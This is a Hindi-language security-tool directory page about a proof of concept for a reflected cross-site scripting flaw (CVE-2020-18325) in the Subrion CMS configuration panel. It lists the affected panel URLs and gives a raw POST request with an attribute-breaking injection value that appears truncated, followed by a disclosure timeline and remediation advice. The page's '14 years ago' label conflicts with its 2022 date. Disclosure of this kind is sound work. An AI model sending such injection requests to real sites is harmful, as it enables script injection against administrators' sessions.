Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-18325 — Subrion CMS v4.2.1 कॉन्फ़िगरेशन पैनल में प्रतिबिंबित XSS भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, POST अनुरोधों के माध्यम से JavaScript इंजेक्शन प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/hamm0nz/cve-2020-18325
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhamm0nz/cve-2020-18325

CVE-2020-18325

Subrion CMS v4.2.1 कॉन्फ़िगरेशन पैनल में प्रतिबिंबित XSS भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, POST अनुरोधों के माध्यम से JavaScript इंजेक्शन प्रदर्शित करता है।

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Intelliants Subrion CMS v4.2.1 के कॉन्फ़िगरेशन पैनल में एकाधिक क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी मौजूद है।

विवरण

Subrion CMS को इंस्टॉल करना आसान और प्रबंधित करना सरल है। इसका उपयोग एक स्वतंत्र एप्लिकेशन के रूप में या अन्य एप्लिकेशनों के साथ मिलकर एंट्री-लेवल साइट्स, मध्यम आकार या बड़ी साइट्स बनाने के लिए करें।

Subrion CMS v.4.2.1 के कॉन्फ़िगरेशन पैनल में कई रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग कमजोरियाँ पाई गईं, जो एक दूरस्थ हमलावर को मनमाना JavaScript इंजेक्ट करने की अनुमति देती हैं।

दिनांक: 27-02-2022
सॉफ्टवेयर लिंक: https://subrion.org
एक्सप्लॉइट लेखक: HaMM0nz
CVE: CVE-2020-18325
श्रेणी: वेब एप्लिकेशन
प्रभावित URL

  • /panel/configuration/pictures/
  • /panel/configuration/mail/
  • /panel/configuration/miscellaneous/
  • /panel/menus/add/

प्रूफ ऑफ कॉन्सेप्ट

POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/ Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623 Content-Length: 5605 Connection: close Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded Upgrade-Insecure-Requests: 1






-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"

1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"

75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx

टाइमलाइन

खोज और रिपोर्ट : 24 जून 2019
CVE ID आवंटित : 11 अगस्त 2021
सार्वजनिक : 27 फरवरी 2022

समाधान

OWASP के XSS रोकथाम दिशानिर्देशों का अनुपालन करने पर विचार करें। (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

टूल डाउनलोड करें